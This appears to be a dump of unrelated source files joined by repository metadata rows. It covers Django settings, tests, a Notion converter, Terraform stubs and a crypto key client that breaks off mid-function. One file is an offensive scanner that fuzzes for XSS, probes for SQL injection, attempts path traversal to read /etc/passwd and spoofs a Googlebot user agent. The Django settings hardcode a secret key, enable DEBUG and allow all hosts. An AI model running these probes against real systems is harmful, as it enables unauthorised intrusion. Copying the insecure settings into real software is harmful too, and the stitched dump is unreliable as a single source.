ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'oidc_provider',
]
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'oidc_provider.middleware.SessionManagementMiddleware',
]
MIDDLEWARE = MIDDLEWARE_CLASSES
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'app.urls'
WSGI_APPLICATION = 'app.wsgi.application'
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'DATABASE.sqlite3'),
}
}
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
# Custom settings
LOGIN_REDIRECT_URL = '/'
# OIDC Provider settings
SITE_URL = 'http://localhost:8000'
OIDC_SESSION_MANAGEMENT_ENABLE = True
| 22.456522
| 71
| 0.683446
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'c14d549c574e4d8cf162404ef0b04598'
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['*']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'oidc_provider',
]
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'oidc_provider.middleware.SessionManagementMiddleware',
]
MIDDLEWARE = MIDDLEWARE_CLASSES
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'app.urls'
WSGI_APPLICATION = 'app.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'DATABASE.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
LOGIN_REDIRECT_URL = '/'
SITE_URL = 'http://localhost:8000'
OIDC_SESSION_MANAGEMENT_ENABLE = True
| true
| true
|
1c3e998b9342a4dd7b2dce19744c8e34e5d95b7c
| 180
|
py
|
Python
|
tests/web_platform/css_flexbox_1/test_flexbox_flex_0_1_N_unitless_basis.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_flex_0_1_N_unitless_basis.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_flex_0_1_N_unitless_basis.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | 1
|
2020-01-16T01:56:41.000Z
|
2020-01-16T01:56:41.000Z
|
from tests.utils import W3CTestCase
class TestFlexbox_Flex01NUnitlessBasis(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'flexbox_flex-0-1-N-unitless-basis'))
| 30
| 88
| 0.811111
|
from tests.utils import W3CTestCase
class TestFlexbox_Flex01NUnitlessBasis(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'flexbox_flex-0-1-N-unitless-basis'))
| true
| true
|
1c3e9a29ee05e6cb175f2be801373c64e64750f2
| 481
|
py
|
Python
|
test/test_db_matches_ui.py
|
karagioz/python_training
|
47bdbc550eda347f72aaf75dd3569d2c61106356
|
[
"Apache-2.0"
] | null | null | null |
test/test_db_matches_ui.py
|
karagioz/python_training
|
47bdbc550eda347f72aaf75dd3569d2c61106356
|
[
"Apache-2.0"
] | null | null | null |
test/test_db_matches_ui.py
|
karagioz/python_training
|
47bdbc550eda347f72aaf75dd3569d2c61106356
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
from timeit import timeit
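# Check that the group list rendered in the UI matches the database contents,
# stripping whitespace from DB group names before comparing the sorted lists.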
def test_group_list(app, db):
print(timeit(lambda: app.group.get_group_list(), number=1))
ui_list = app.group.get_group_list()
def clean(group):
return Group(id=group.id, name=group.name.strip())
print(timeit(lambda: map(clean, db.get_group_list()), number=1000))
db_list = map(clean, db.get_group_list())
assert sorted(ui_list, key=Group.id_or_max) == sorted(db_list, key=Group.id_or_max)
| 34.357143
| 87
| 0.715177
|
from model.group import Group
from timeit import timeit
def test_group_list(app, db):
print(timeit(lambda: app.group.get_group_list(), number=1))
ui_list = app.group.get_group_list()
def clean(group):
return Group(id=group.id, name=group.name.strip())
print(timeit(lambda: map(clean, db.get_group_list()), number=1000))
db_list = map(clean, db.get_group_list())
assert sorted(ui_list, key=Group.id_or_max) == sorted(db_list, key=Group.id_or_max)
| true
| true
|
1c3e9a93f3dffeb4d7093c7ec141c50bb1019b1f
| 4,850
|
py
|
Python
|
zeeb_src/lib/scanner.py
|
th3cyb3rc0p/Zeebsploit
|
5d3bee6c3a459f172ef117548c3a895195a249ff
|
[
"Apache-2.0"
] | 186
|
2019-02-01T16:14:09.000Z
|
2022-03-10T06:43:16.000Z
|
zeeb_src/lib/scanner.py
|
Tonymmm/Zeebsploit
|
5d3bee6c3a459f172ef117548c3a895195a249ff
|
[
"Apache-2.0"
] | 8
|
2019-02-02T19:09:07.000Z
|
2019-10-03T05:06:27.000Z
|
zeeb_src/lib/scanner.py
|
Tonymmm/Zeebsploit
|
5d3bee6c3a459f172ef117548c3a895195a249ff
|
[
"Apache-2.0"
] | 65
|
2019-02-25T07:28:03.000Z
|
2021-10-30T19:59:57.000Z
|
#-*- coding: utf-8 -*-
import asyncio,aiohttp,requests,os,urllib3,aiofiles,re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class subdomain_enumeration(object):
def __init__(self,domain):
self.domain = domain
self.url = 'https://dnsdumpster.com'
self.uag = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
self.dns_dumpster = []
def DNSdumpster(self):
get_token = requests.get(self.url,headers={'User-Agent':self.uag})
token = re.findall("value=\'(.*?)\'",get_token.text)[0]
post = requests.post(
self.url,
data={
'csrfmiddlewaretoken':token,
'targetip':self.domain
},
cookies={
'csrftoken':token
},
headers={
'User-Agent':self.uag,
'Referer':self.url
}
)
subdo = re.findall('http://(.*?)"',post.text)
for x in subdo:
self.dns_dumpster.append(x)
@property
def raw_result(self):
return self.dns_dumpster
class fuzzer(object):
def __init__(self,target,path):
self.target = target
self.path = path
self.user_agent = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'}
self.__xss_result = []
self.__fuzz = []
@property
def raw_xss_result(self):
return self.__xss_result
@property
def raw_fuzz(self):
return self.__fuzz
async def request(self,payload,session,isi):
try:
async with session.get(f'{self.target}/{payload}',ssl=False) as resp:
content = await resp.text()
status = resp.status
if 'xss' in isi:
if payload in content:
self.__xss_result.append(resp.url)
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
else:
if status == 200:
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
self.__fuzz.append(resp.url)
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
resp.closed
except Exception:
pass
async def _fetch(self,iii):
connector = aiohttp.TCPConnector(limit=None)
async with aiohttp.ClientSession(connector=connector) as sesi:
with open(self.path,'r') as open_files:
tas = [self.request(pilod.rstrip(),sesi,iii)for pilod in open_files.readlines()]
await asyncio.gather(*tas)
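    # Append a single quote to the target URL and scan the response for database error
    # signatures from query_error (name -> regex) to flag possible SQL injection.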
@classmethod
def sqli_scan(cls,url,query_error):
vuln = 0
types = ''
error = ''
r = requests.get(
f"{url}'",
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text):
vuln += 1
types += a
error += b
break
else:
pass
return vuln,types,error
@classmethod
def subdomain_takeover(cls,url,query_error):
vuln = ''
r = requests.get(
url,
headers={'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text,re.I) and re.search('[300-499]',str(r.status_code)):
vuln += a
break
else:
pass
return vuln
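    # Probe for local file inclusion by prepending an increasing number of "../"
    # segments to /etc/passwd and flagging responses that contain "root:x:0:0".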
@classmethod
def lfi_scanner(cls,url):
vuln = ''
params = '../'
for x in range(1,20):
p = params*x
r = requests.get(
f'{url}{p}/etc/passwd',
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
if 'root:x:0:0' in r.text:
print(f'\033[92m[+]\033[0m {r.url} : \033[92mvulnerability\033[0m')
else:
                print(f'\033[93m[-]\033[0m {r.url} : \033[93mnot vulnerability\033[0m')
| 35.925926
| 117
| 0.478144
|
import asyncio,aiohttp,requests,os,urllib3,aiofiles,re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class subdomain_enumeration(object):
def __init__(self,domain):
self.domain = domain
self.url = 'https://dnsdumpster.com'
self.uag = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
self.dns_dumpster = []
def DNSdumpster(self):
get_token = requests.get(self.url,headers={'User-Agent':self.uag})
token = re.findall("value=\'(.*?)\'",get_token.text)[0]
post = requests.post(
self.url,
data={
'csrfmiddlewaretoken':token,
'targetip':self.domain
},
cookies={
'csrftoken':token
},
headers={
'User-Agent':self.uag,
'Referer':self.url
}
)
subdo = re.findall('http://(.*?)"',post.text)
for x in subdo:
self.dns_dumpster.append(x)
@property
def raw_result(self):
return self.dns_dumpster
class fuzzer(object):
def __init__(self,target,path):
self.target = target
self.path = path
self.user_agent = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'}
self.__xss_result = []
self.__fuzz = []
@property
def raw_xss_result(self):
return self.__xss_result
@property
def raw_fuzz(self):
return self.__fuzz
async def request(self,payload,session,isi):
try:
async with session.get(f'{self.target}/{payload}',ssl=False) as resp:
content = await resp.text()
status = resp.status
if 'xss' in isi:
if payload in content:
self.__xss_result.append(resp.url)
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
else:
if status == 200:
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
self.__fuzz.append(resp.url)
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
resp.closed
except Exception:
pass
async def _fetch(self,iii):
connector = aiohttp.TCPConnector(limit=None)
async with aiohttp.ClientSession(connector=connector) as sesi:
with open(self.path,'r') as open_files:
tas = [self.request(pilod.rstrip(),sesi,iii)for pilod in open_files.readlines()]
await asyncio.gather(*tas)
@classmethod
def sqli_scan(cls,url,query_error):
vuln = 0
types = ''
error = ''
r = requests.get(
f"{url}'",
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text):
vuln += 1
types += a
error += b
break
else:
pass
return vuln,types,error
@classmethod
def subdomain_takeover(cls,url,query_error):
vuln = ''
r = requests.get(
url,
headers={'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text,re.I) and re.search('[300-499]',str(r.status_code)):
vuln += a
break
else:
pass
return vuln
@classmethod
def lfi_scanner(cls,url):
vuln = ''
params = '../'
for x in range(1,20):
p = params*x
r = requests.get(
f'{url}{p}/etc/passwd',
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
if 'root:x:0:0' in r.text:
print(f'\033[92m[+]\033[0m {r.url} : \033[92mvulnerability\033[0m')
else:
                print(f'\033[93m[-]\033[0m {r.url} : \033[93mnot vulnerability\033[0m')
| true
| true
|
1c3e9aa4508a692e561336b57c059caf9056b9b3
| 2,948
|
py
|
Python
|
process.py
|
yangliu2/BearNotes_to_Notion
|
ae06f4c3fbdefe2020899416e5b478ad9d434664
|
[
"MIT"
] | 1
|
2021-02-07T17:59:26.000Z
|
2021-02-07T17:59:26.000Z
|
process.py
|
yangliu2/BearNotes_to_Notion
|
ae06f4c3fbdefe2020899416e5b478ad9d434664
|
[
"MIT"
] | null | null | null |
process.py
|
yangliu2/BearNotes_to_Notion
|
ae06f4c3fbdefe2020899416e5b478ad9d434664
|
[
"MIT"
] | null | null | null |
from glob import glob
from pathlib import Path
def bear_to_notion(source_folder: str = 'bear_notes',
dst_folder: str = 'changed_notes') -> None:
"""Convert Bear notes in markdown format to Notion formats. It mainly
remove the tags
Args:
source_folder (str, optional): [description]. Defaults to 'bear_notes'.
dst_folder (str, optional): [description]. Defaults to 'changed_notes'.
"""
file_list = glob("bear_notes/*.md")
for file in file_list:
output = ""
title = ""
with open(file) as input_file:
# write the first line directly because it's often the date
output += next(input_file)
title = output
tabed_line = False
block_tag = False
tag = ""
for line in input_file:
tab_count = 0
# check if this is in a list
if line[0].isdigit():
tabed_line = True
# take out leading # because it won't process indentations with
                # leading "#"
if line.startswith('#') and not block_tag:
tag += line
# process the code blocks by indentation
elif line.startswith('```') and not block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = True
elif line.startswith('```') and block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = False
elif block_tag and tabed_line:
output += f"{tab_string}{line}"
else:
output += line
# count how many tabs are there to indent code properly
tab_count = line.count("\t")
tab_string = "\t" * tab_count
# print tag at the end
if tag:
output += f"\n\ntags: {tag}"
# write to output file
# take out first "# " char
no_hash_title = title[2:].replace("\n","")
# if first letter is a number
if no_hash_title[0].isdigit() and "/" in no_hash_title:
tokens = no_hash_title.split("/")
            # sometimes the year is 4 digits long
if len(tokens[2]) == 4:
changed_title = f"{tokens[2]}-{tokens[0]}-{tokens[1]}"
else:
changed_title = f"20{tokens[2]}-{tokens[0]}-{tokens[1]}"
dst_file = Path(dst_folder) / Path(f"{changed_title}.md")
else:
dst_file = Path(dst_folder) / Path(f"{no_hash_title}.md")
with open(dst_file, "w") as output_file:
output_file.write(output)
def main():
bear_to_notion()
if __name__ == "__main__":
main()
| 33.123596
| 79
| 0.500678
|
from glob import glob
from pathlib import Path
def bear_to_notion(source_folder: str = 'bear_notes',
dst_folder: str = 'changed_notes') -> None:
file_list = glob("bear_notes/*.md")
for file in file_list:
output = ""
title = ""
with open(file) as input_file:
output += next(input_file)
title = output
tabed_line = False
block_tag = False
tag = ""
for line in input_file:
tab_count = 0
# check if this is in a list
if line[0].isdigit():
tabed_line = True
# take out leading # because it won't process indentations with
if line.startswith('#') and not block_tag:
tag += line
elif line.startswith('```') and not block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = True
elif line.startswith('```') and block_tag and tabed_line:
output += f"{tab_string}{line}"
block_tag = False
elif block_tag and tabed_line:
output += f"{tab_string}{line}"
else:
output += line
tab_count = line.count("\t")
tab_string = "\t" * tab_count
if tag:
output += f"\n\ntags: {tag}"
no_hash_title = title[2:].replace("\n","")
if no_hash_title[0].isdigit() and "/" in no_hash_title:
tokens = no_hash_title.split("/")
if len(tokens[2]) == 4:
changed_title = f"{tokens[2]}-{tokens[0]}-{tokens[1]}"
else:
changed_title = f"20{tokens[2]}-{tokens[0]}-{tokens[1]}"
dst_file = Path(dst_folder) / Path(f"{changed_title}.md")
else:
dst_file = Path(dst_folder) / Path(f"{no_hash_title}.md")
with open(dst_file, "w") as output_file:
output_file.write(output)
def main():
bear_to_notion()
if __name__ == "__main__":
main()
| true
| true
|
1c3e9ab846f7918dcf9e79fdc7c1a3960ef0324e
| 1,408
|
py
|
Python
|
terrascript/opsgenie/r.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/opsgenie/r.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/opsgenie/r.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/opsgenie/r.py
# Automatically generated by tools/makecode.py ()
import warnings
warnings.warn(
"using the 'legacy layout' is deprecated", DeprecationWarning, stacklevel=2
)
import terrascript
class opsgenie_alert_policy(terrascript.Resource):
pass
class opsgenie_api_integration(terrascript.Resource):
pass
class opsgenie_custom_role(terrascript.Resource):
pass
class opsgenie_email_integration(terrascript.Resource):
pass
class opsgenie_escalation(terrascript.Resource):
pass
class opsgenie_heartbeat(terrascript.Resource):
pass
class opsgenie_incident_template(terrascript.Resource):
pass
class opsgenie_integration_action(terrascript.Resource):
pass
class opsgenie_maintenance(terrascript.Resource):
pass
class opsgenie_notification_policy(terrascript.Resource):
pass
class opsgenie_notification_rule(terrascript.Resource):
pass
class opsgenie_schedule(terrascript.Resource):
pass
class opsgenie_schedule_rotation(terrascript.Resource):
pass
class opsgenie_service(terrascript.Resource):
pass
class opsgenie_service_incident_rule(terrascript.Resource):
pass
class opsgenie_team(terrascript.Resource):
pass
class opsgenie_team_routing_rule(terrascript.Resource):
pass
class opsgenie_user(terrascript.Resource):
pass
class opsgenie_user_contact(terrascript.Resource):
pass
| 16.372093
| 79
| 0.791193
|
import warnings
warnings.warn(
"using the 'legacy layout' is deprecated", DeprecationWarning, stacklevel=2
)
import terrascript
class opsgenie_alert_policy(terrascript.Resource):
pass
class opsgenie_api_integration(terrascript.Resource):
pass
class opsgenie_custom_role(terrascript.Resource):
pass
class opsgenie_email_integration(terrascript.Resource):
pass
class opsgenie_escalation(terrascript.Resource):
pass
class opsgenie_heartbeat(terrascript.Resource):
pass
class opsgenie_incident_template(terrascript.Resource):
pass
class opsgenie_integration_action(terrascript.Resource):
pass
class opsgenie_maintenance(terrascript.Resource):
pass
class opsgenie_notification_policy(terrascript.Resource):
pass
class opsgenie_notification_rule(terrascript.Resource):
pass
class opsgenie_schedule(terrascript.Resource):
pass
class opsgenie_schedule_rotation(terrascript.Resource):
pass
class opsgenie_service(terrascript.Resource):
pass
class opsgenie_service_incident_rule(terrascript.Resource):
pass
class opsgenie_team(terrascript.Resource):
pass
class opsgenie_team_routing_rule(terrascript.Resource):
pass
class opsgenie_user(terrascript.Resource):
pass
class opsgenie_user_contact(terrascript.Resource):
pass
| true
| true
|
1c3e9b4eca04a197b5e9a5aa98e9653eb68cc0da
| 213
|
py
|
Python
|
rapa/__init__.py
|
FOXOBioScience/rapa
|
ab226d0c27a867b43a76f576c98a954de9504360
|
[
"MIT"
] | 1
|
2021-04-29T16:42:12.000Z
|
2021-04-29T16:42:12.000Z
|
rapa/__init__.py
|
FoxoTech/rapa
|
ab226d0c27a867b43a76f576c98a954de9504360
|
[
"MIT"
] | 4
|
2021-02-24T18:24:17.000Z
|
2021-03-18T17:58:51.000Z
|
rapa/__init__.py
|
FOXOBioScience/rapa
|
ab226d0c27a867b43a76f576c98a954de9504360
|
[
"MIT"
] | 1
|
2021-11-12T02:04:05.000Z
|
2021-11-12T02:04:05.000Z
|
# Warnings from dependencies are suppressed everywhere, and this propagates into all created loggers
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from . import rapa
from . import version
| 35.5
| 92
| 0.830986
|
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from . import rapa
from . import version
| true
| true
|
1c3e9b81fd617497d11f8c7dfa97e3268d0c825b
| 17,342
|
py
|
Python
|
backend/backend/utils/key_client.py
|
ravirahman/sancus
|
6563852b98edeb1068574e2d99e1fc18b815bee3
|
[
"MIT"
] | 2
|
2022-03-17T04:50:20.000Z
|
2022-03-17T04:51:31.000Z
|
backend/backend/utils/key_client.py
|
ravirahman/sancus
|
6563852b98edeb1068574e2d99e1fc18b815bee3
|
[
"MIT"
] | null | null | null |
backend/backend/utils/key_client.py
|
ravirahman/sancus
|
6563852b98edeb1068574e2d99e1fc18b815bee3
|
[
"MIT"
] | null | null | null |
import logging
import secrets
import uuid
from decimal import Decimal
from typing import List, Optional, Sequence
import petlib.ec
import sqlalchemy.orm
from common.constants import ADMIN_UUID, SECP256K1_ORDER, Blockchain, Currency
from common.utils.uuid import generate_uuid4
from common.utils.zk import NIZK
from common.utils.zk.bit_commitment import generate_bit_commitment
from common.utils.zk.key_permutation import permute_private_key, permute_public_key
from protobufs.institution.account_pb2 import KeyType
from sqlalchemy import desc
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import Session
from sqlalchemy.orm.exc import NoResultFound
from backend.sql.account import Account
from backend.sql.blockchain_address_key import BlockchainAddressKey
from backend.sql.key import Key
from backend.sql.key_account_commitment import KeyAccountCommitment
from backend.sql.key_currency_account import KeyCurrencyAccount
from backend.sql.key_currency_block import KeyCurrencyBlock
LOGGER = logging.getLogger(__name__)
class KeyClient:
def __init__(
self,
sessionmaker: sqlalchemy.orm.sessionmaker,
deposit_key_decoy_set_size: int,
) -> None:
self._sessionmaker = sessionmaker
self._deposit_key_decoy_set_size = deposit_key_decoy_set_size
@staticmethod
def _add_new_key_account_commitment(
session: Session,
key: Key,
account_uuid: uuid.UUID,
deposits_will_be_credited_to_account_for_key: bool,
) -> None:
r = SECP256K1_ORDER.random()
permuted_public_key = key.permuted_secp256k1_public_key
_, bit_commitment_nizk = generate_bit_commitment(
s=deposits_will_be_credited_to_account_for_key, G=permuted_public_key, r=r
)
session.add(
KeyAccountCommitment(
key_uuid=key.key_uuid,
account_uuid=account_uuid,
s=deposits_will_be_credited_to_account_for_key,
r=r,
nizk=bit_commitment_nizk,
)
)
@staticmethod
def _add_blockchain_addresses(session: Session, key: Key) -> None:
for blockchain in Blockchain:
address = key.get_address(blockchain)
session.add(
BlockchainAddressKey(
blockchain=blockchain,
address=address,
key_uuid=key.key_uuid,
)
)
def _add_new_hot_key(self, session: Session, private_key: petlib.bn.Bn) -> Key:
k = SECP256K1_ORDER.random()
permuted_private_key, nizk = permute_private_key(private_key, k)
key = Key(
key_uuid=generate_uuid4(),
key_type=KeyType.HOT,
private_key=private_key,
permuted_private_key=permuted_private_key,
permutation_nizk=nizk,
)
session.add(key)
self._track_owned_key(session, key)
self._add_blockchain_addresses(session, key)
return key
@staticmethod
def get_key_currency_block(
session: Session, key_uuid: uuid.UUID, currency: Currency, block_number: int
) -> KeyCurrencyBlock:
key_currency_block = (
session.query(KeyCurrencyBlock)
.filter(
KeyCurrencyBlock.key_uuid == key_uuid,
KeyCurrencyBlock.currency == currency,
KeyCurrencyBlock.block_number <= block_number,
)
.order_by(desc(KeyCurrencyBlock.block_number))
.first()
)
if key_currency_block is None:
raise ValueError(f"key_uuid({key_uuid}) not found")
return key_currency_block
def get_balance(self, key_uuid: uuid.UUID, currency: Currency, block_number: int) -> Decimal:
with self._sessionmaker() as session:
key_currency = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == currency,
)
.one()
)
initial_balance = key_currency.initial_balance
key_currency_block = self.get_key_currency_block(session, key_uuid, currency, block_number)
balance = (
initial_balance
+ key_currency_block.cumulative_tracked_deposit_amount
- key_currency_block.cumulative_tracked_withdrawal_amount
)
assert isinstance(balance, Decimal)
return balance
def find_or_create_admin_key(
self, session: Session, currency: Currency, *, excluded_key_uuids: Sequence[uuid.UUID] = tuple()
) -> Key:
        # This function returns a key that, for this session, is guaranteed to be admin-owned.
        # The caller must perform an atomic update of the pending_admin_deposits counter whenever
        # using this key for deposits, and that atomic update must require that the key is still
        # an admin key.
query = session.query(Key).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
Key.key_uuid == KeyCurrencyAccount.key_uuid,
Key.key_uuid.notin_(excluded_key_uuids),
)
count = query.count()
key: Optional[Key] = None
if count > 0:
key = query.order_by(Key.created_at).offset(secrets.randbelow(count)).first()
if key is None:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
return key
def make_new_hot_key(self) -> uuid.UUID:
with self._sessionmaker() as session:
private_key = SECP256K1_ORDER.random()
key = self._add_new_hot_key(session, private_key)
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
def import_hot_key(self, private_key: petlib.bn.Bn, ethereum_transaction_count: int = 0) -> uuid.UUID:
with self._sessionmaker() as session:
key = self._add_new_hot_key(session, private_key)
key.ethereum_transaction_count = ethereum_transaction_count
session.commit()
key_uuid = key.key_uuid
assert isinstance(key_uuid, uuid.UUID)
return key_uuid
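    # Commit the key to the real account plus randomly chosen decoy accounts of the same
    # type and currency, inserting the commitments in shuffled order so creation
    # timestamps do not reveal which account is real.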
def _add_key_and_decoy_accounts(self, session: Session, key: Key, account: Account) -> None:
decoy_account_uuids = [account.uuid]
while len(decoy_account_uuids) < self._deposit_key_decoy_set_size:
query = session.query(Account.uuid).filter(
Account.uuid.notin_(decoy_account_uuids),
Account.account_type == account.account_type,
Account.currency == account.currency,
)
count = query.count()
if count == 0:
break
decoy_accounts = query.order_by(Account.created_at).offset(secrets.randbelow(count)).first()
if decoy_accounts is not None:
(decoy_account_uuid,) = decoy_accounts
decoy_account_uuids.append(decoy_account_uuid)
# we want to randomize the order in which we add the accounts so timestamps aren't a giveaway
while len(decoy_account_uuids) > 0:
i = secrets.randbelow(len(decoy_account_uuids))
account_uuid = decoy_account_uuids[i]
decoy_account_uuids[i] = decoy_account_uuids[-1]
decoy_account_uuids.pop()
if account_uuid == account.uuid:
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account.uuid,
# if account is owned by admin, never credit deposits
deposits_will_be_credited_to_account_for_key=account.user_uuid != ADMIN_UUID,
)
continue
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=False,
)
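    # Try to claim an unused admin-owned key for this account's currency, retrying on
    # races; if none can be locked, mint a fresh hot key. Decoy commitments are added so
    # the key-to-account assignment stays hidden.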
def find_or_create_key_and_assign_to_account(self, account_uuid: uuid.UUID) -> uuid.UUID:
with self._sessionmaker() as session:
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
currency = account.currency
bad_key_uuids: List[uuid.UUID] = []
for _ in range(5):
with self._sessionmaker() as session:
# select a "candidate" without locking
query = session.query(KeyCurrencyAccount.key_uuid).filter(
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
KeyCurrencyAccount.key_uuid.notin_(bad_key_uuids),
)
count = query.count()
if count == 0:
break
offset = secrets.randbelow(count)
key_uuids = query.order_by(KeyCurrencyAccount.created_at).offset(offset).first()
if key_uuids is None:
break
(key_uuid,) = key_uuids
assert isinstance(key_uuid, uuid.UUID)
# check to see if we are a decoy
already_a_commitment = (
session.query(KeyAccountCommitment)
.filter(
KeyAccountCommitment.key_uuid == key_uuid, KeyAccountCommitment.account_uuid == account_uuid
)
.limit(1)
.count()
> 0
)
if already_a_commitment:
bad_key_uuids.append(key_uuid)
continue
with self._sessionmaker() as session:
# now, attempt to lock the candidate
try:
key_currency_account = (
session.query(KeyCurrencyAccount)
.filter(
KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.currency == currency,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update(nowait=True)
.one()
)
except (OperationalError, NoResultFound):
# race condition
continue
account = (
session.query(Account)
.filter(
Account.uuid == account_uuid,
)
.one()
)
key_currency_account.account_uuid = account_uuid
                # if the account is the admin account, set pending_admin_deposits to 1
                # so this key is permanently locked
key_currency_account.pending_admin_deposits = int(account_uuid == ADMIN_UUID)
